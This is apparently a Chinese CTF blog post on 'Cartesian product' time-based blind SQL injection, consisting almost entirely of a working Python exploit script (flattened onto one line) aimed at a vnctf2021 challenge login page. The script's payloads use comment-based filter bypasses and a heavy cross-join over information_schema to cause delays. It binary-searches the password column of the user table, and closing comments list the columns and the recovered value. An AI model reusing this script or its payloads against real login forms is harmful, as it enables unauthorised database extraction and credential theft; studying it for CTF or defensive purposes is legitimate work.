笛卡尔积注入
import requestsurl="http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"flag=''for i in range(1,50):f1=flagtop=127low=33while low<=top:mid=(top+low)//2# p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)# p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)data1={'username':'admin','password':p1}data2={'username':'admin','password':p2}try:print(i,mid)r1=requests.post(url,data=data1,timeout=1)except requests.exceptions.ReadTimeout as e:flag+=chr(mid)print(flag)breakexcept Exception as e:passelse:try:r2=requests.post(url,data=data2,timeout=1)except requests.exceptions.ReadTimeout as e:low=mid+1except Exception as e:passelse:top=mid-1if flag==f1:break# user# id,username,password# no_0ne_kn0w_th1s
若有收获,就点个赞吧
0 人点赞
